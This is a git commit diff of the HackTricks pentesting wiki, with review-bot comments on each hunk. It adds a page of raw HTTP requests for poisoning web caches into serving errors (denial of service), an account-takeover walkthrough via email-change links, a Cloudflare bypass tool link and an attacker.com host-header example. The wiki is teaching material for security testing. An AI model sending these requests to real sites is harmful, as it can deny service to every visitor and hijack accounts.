GITBOOK-4306: No subject

This commit is contained in:
CPol 2024-04-10 13:29:30 +00:00 committed by gitbook-bot
parent 91a2189fb2
commit 2572c94842
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
8 changed files with 255 additions and 22 deletions

View file

@ -526,7 +526,8 @@
* [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
* [Captcha Bypass](pentesting-web/captcha-bypass.md)
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md)
* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception/README.md)
* [Cache Poisoning to DoS](pentesting-web/cache-deception/cache-poisoning-to-dos.md)
* [Clickjacking](pentesting-web/clickjacking.md)
* [Client Side Template Injection (CSTI)](pentesting-web/client-side-template-injection-csti.md)
* [Client Side Path Traversal](pentesting-web/client-side-path-traversal.md)
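Review bot: moving `cache-deception.md` to `cache-deception/README.md` breaks every link to the old path, so a repo-wide grep for `cache-deception.md` before merge should confirm that only the files touched in this commit referenced it; the `special-http-headers.md` and `pentesting-web/README.md` hunks below do update theirs, and the new `cache-poisoning-to-dos.md` entry sits correctly under the new directory.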

View file

@ -185,6 +185,10 @@ It's common to have a cron job such as
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
### Mail DMARC information
You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**.
### **Passive Takeover**
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
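Review bot: the new `### Mail DMARC information` heading does not follow the bold heading style of the neighbouring `### **Passive Takeover**` section, and the sentence should read "domains and subdomains sharing the same DMARC record". It would also help to say what in the record is being compared, since a shared DMARC record on its own is only a weak signal of common ownership and the reader should know what to verify before treating a match as in scope.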
@ -223,6 +227,10 @@ _Note that sometimes the domain is hosted inside an IP that is not controlled by
It's time to find all the possible subdomains of each found domain.
{% hint style="success" %}
Note that some of the tools and techniques to find domains can also help to find subdomains!
{% endhint %}
### **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).

View file

@ -75,8 +75,8 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
* **`Age`** defines the times in seconds the object has been in the proxy cache.
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
{% content-ref url="../../pentesting-web/cache-deception.md" %}
[cache-deception.md](../../pentesting-web/cache-deception.md)
{% content-ref url="../../pentesting-web/cache-deception/" %}
[cache-deception](../../pentesting-web/cache-deception/)
{% endcontent-ref %}
**Local Cache headers**:
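Review bot: the `content-ref` now points at the directory `../../pentesting-web/cache-deception/` while the SUMMARY entry uses `cache-deception/README.md`; GitBook resolves a directory link to its README, but using one form consistently keeps future link checks simple.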

View file

@ -49,7 +49,7 @@ for ir in `curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixe
done
```
## Uncovering Cloudflare from Cloud machines
## Uncovering Cloudflare from Cloud infrastructure
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
@ -80,7 +80,7 @@ This mechanism relies on **client** [**SSL certificates**](https://socradar.io/h
Instead of configuring it's own certificate, customers can simple use Cloudflares certificate to allow any connection from Cloudflare, **regardless of the tenant**.
{% hint style="danger" %}
Therefore, an attacker could just set a **domain in Cloudflare using CLoudflares certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
Therefore, an attacker could just set a **domain in Cloudflare using Cloudflare's certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
{% endhint %}
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
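Review bot: the fix to `Cloudflare's certificate` on the changed line leaves the same possessive error one line up in the unchanged context, `Instead of configuring it's own certificate, customers can simple use Cloudflares certificate`, which should read `its own certificate, customers can simply use Cloudflare's certificate`. In the changed line, `setting his domain completely unprotected` is ambiguous; `by leaving their own Cloudflare zone unprotected` says what is meant. The hint could also close with the fix the surrounding text implies: origins should authenticate a tenant-specific client certificate rather than the shared Cloudflare one.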
@ -100,6 +100,12 @@ Sometimes you just want to bypass Cloudflare to only scrape the web page. There
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
### Tools
Some tools like the following ones can bypass (or were able to bypass) Cloudflare's protection against scraping:
* [https://github.com/sarperavci/CloudflareBypassForScraping](https://github.com/sarperavci/CloudflareBypassForScraping)
### Cloudflare Solvers
There have been a number of Cloudflare solvers developed:
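Review bot: `### Tools` and `### Cloudflare Solvers` now sit back to back as two lists of the same kind of thing; merging them under one heading, or stating how a "solver" differs from the scraping-bypass tool, would avoid the split. The parenthetical `(or were able to bypass)` hedges without informing; a date, or a note that such tools stop working whenever Cloudflare updates its challenge logic, would be more useful to the reader.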

View file

@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
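Review bot: escaping the underscore in `hacktricks\_live` fixes the GitBook rendering, but the link text `@carlospolopm` still names a different handle than the URL `twitter.com/hacktricks_live`; the same mismatch appears in the other footer blocks in this commit (the second `account-takeover.md` hunk and both ends of `cache-poisoning-to-dos.md`). Pick whichever handle is current and use it in both the text and the URL.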
@ -38,7 +38,6 @@ Should the target system allow the **reset link to be reused**, efforts should b
2. One should wait until the victim signs up using OAuth and confirms the account.
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
## **CORS Misconfiguration to Account Takeover**
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
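Review bot: the unchanged context line under `## **CORS Misconfiguration to Account Takeover**` carries `CORS missconfigurations` and `takeover his account`; since this hunk already touches the heading region, fixing `misconfigurations` and `take over their account` here is cheap.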
@ -97,16 +96,26 @@ If the authentication response could be **reduced to a simple boolean just try t
## Response Manipulation
1. **Code Manipulation**: The status code is altered to `200 OK`.
2. **Code and Body Manipulation**:
- The status code is changed to `200 OK`.
- The response body is modified to `{"success":true}` or an empty object `{}`.
2. **Code and Body Manipulation**:
* The status code is changed to `200 OK`.
* The response body is modified to `{"success":true}` or an empty object `{}`.
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
## Change email of current session
From [this report](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea):
* Attacker requests to change his email with a new one
* Attacker receives a link to confirm the change of the email
* Attacker send the victim the link so he clicks it
* The victims email is changed to the one indicated by the attacker
* The attack can recover the password and take over the account
## References
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
* [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
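Review bot: the new `## Change email of current session` section describes the flaw without naming it or its fix: the email-change confirmation link is not bound to the account that requested it, so whichever logged-in user opens it has their email replaced. One line on mitigation (verify that the session confirming the change is the one that requested it, and do not let the link alone carry the new address) would make the heading and the steps land. Grammar in the steps: `Attacker send the victim the link so he clicks it` should be `Attacker sends the victim the link so they click it`, `The victims email` should be `The victim's email`, and `The attack can recover the password` should be `The attacker can reset the password`. The `-` to `*` bullet change in Response Manipulation is fine and matches the rest of the file.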
<details>
@ -117,7 +126,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -14,7 +14,7 @@ Other ways to support HackTricks:
</details>
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@ -41,13 +41,19 @@ The execution of a cache poisoning assault involves several steps:
### Discovery: Check HTTP headers
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
### Discovery: Caching 400 code
### Discovery: Caching error codes&#x20;
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\
A badly configured header could be just `\:` as a header.\
_Note that sometimes these kinds of status codes aren't cached so this test will be useless._
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).
You can find more options in:
{% content-ref url="cache-poisoning-to-dos.md" %}
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
However, note that **sometimes these kinds of status codes aren't cached** so this test could not be reliable.
### Discovery: Identify and evaluate unkeyed inputs
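Review bot: the renamed heading `### Discovery: Caching error codes&#x20;` carries a stray trailing `&#x20;` entity, which is editor residue and should be dropped. In the closing sentence, `this test could not be reliable` should read `this test may not be reliable`. Moving the `\:` header example into the new DoS page is reasonable now that the content-ref points there.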
@ -86,6 +92,12 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
_Note that this will poison a request to `/en?region=uk` not to `/en`_
### Cache poisoning to DoS
{% content-ref url="cache-poisoning-to-dos.md" %}
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
{% endcontent-ref %}
### Using web cache poisoning to exploit cookie-handling vulnerabilities
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
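Review bot: this `### Cache poisoning to DoS` content-ref duplicates the one added a few lines earlier under `Discovery: Caching error codes`; one cross-reference is enough, so either keep only this subsection and mention it in a sentence in the discovery text, or drop this one.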
@ -124,9 +136,30 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
X-Host: attacker.com
```
### Fat Get
Send a GET request with the request in the URL and in the body. If the web server uses the one from the body but the cache server caches the one from the URL, anyone accessing that URL will actually use the parameter from the body. Like the vuln James Kettle found at the Github website:
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
report=innocent-victim
```
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### Parameter Cloacking
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Automated testing for Web Cache Poisoning
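Review bot: the Fat GET request block is valid as far as the numbers go (the body `report=innocent-victim` is exactly the 22 bytes that `Content-Length` declares), but the blank line that separates headers from body in HTTP is missing from the block and should be restored so readers do not copy a malformed request. The section would also benefit from stating what makes a deployment safe here: the cache and the origin must agree on which inputs form the key, and the simplest fix is for the origin to ignore, or reject, a body on GET. `### Parameter Cloacking` is a typo for `Cloaking`, `There it a portswigger lab` should be `There is a PortSwigger lab`, and `unkeyed parameters values` should be `unkeyed parameter values`.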
@ -134,7 +167,9 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@ -142,6 +177,8 @@ Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Vulnerable Examples
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
@ -201,7 +238,7 @@ Then, the **attacker** can access _http://www.example.com/home.php/non-existent.
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
## Automatic Tools
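Review bot: the changed line keeps the space inside the link brackets, `perform[ Cache Deceptions attacks`; it should be `perform [Cache Deception attacks` (singular, matching the heading elsewhere on the page).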
@ -216,7 +253,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

View file

@ -0,0 +1,172 @@
# Cache Poisoning to DoS
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% hint style="danger" %}
In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
{% endhint %}
* **HTTP Header Oversize (HHO)**
Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
```
GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000
```
* **HTTP Meta Character (HMC) & Unexpected values**
Send a header that contain some **harmfull meta characters** such as `\n` and `\r`. In order the attack to work you must bypass the cache first.
```
GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r
```
A badly configured header could be just `\:` as a header.
This could also work if unexpected values are sent, like an unexpected Content-Type:
```
GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
```
* **Unkeyed header**
Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
```
GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing
HTTP/2 403 Forbidden
Cache: hit
Invalid Header
```
* **HTTP Method Override Attack (HMO)**
If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
```
GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
```
* **Unkeyed Port**
If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
```
GET /index.html HTTP/1.1
Host: redacted.com:1
HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
```
* **Long Redirect DoS**
Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
```
GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit
GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
```
* **Host header case normalization**
The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
```
GET /img.png HTTP/1.1
Host: Cdn.redacted.com
HTTP/1.1 404 Not Found
Cache:miss
Not Found
```
* **Path normalization**
Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
```
GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com
HTTP/1.1 404 Not Found
Cach:miss
Not Found
```
* **Fat Get**
Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this oucld be abused to cache a invalid response:
```
GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3
xyz
HTTP/2 403 Forbidden
Cache: hit
```
## References
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
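Review bot: several example headers in the new file read as typos rather than intended values: `X-Oversize-Hedear` and `X-Meta-Hedear` (for `Header`), `Cach:miss` (for `Cache: miss`), and in the HMO example the header `HTTP-Method-Override: POST` matches none of the three names the paragraph lists (`X-HTTP-Method-Override`, `X-HTTP-Method`, `X-Method-Override`). Prose fixes: `harmfull` to `harmful`, `In order the attack to work you must bypass the cache first` to `For the attack to work the request must first miss the cache`, `the cache server with URLdecode the path` to `the cache server will URL-decode the path`, `oucld` to `could`, `stops GET requests with a body` to `reject GET requests with a body`, and `changing the method so the server doesn't supports it` to `changing the method to one the server does not support`. Since every variant on the page relies on the cache storing an error response, one sentence on the defensive side would round it out: caches should store 4xx/5xx responses only when the origin explicitly allows it via `Cache-Control`, and the cache key should cover every request input that changes the origin's answer (port in `Host`, header case, URL encoding, method-override headers, a body on GET).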

View file

@ -23,7 +23,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
{% endhint %}
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md)
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)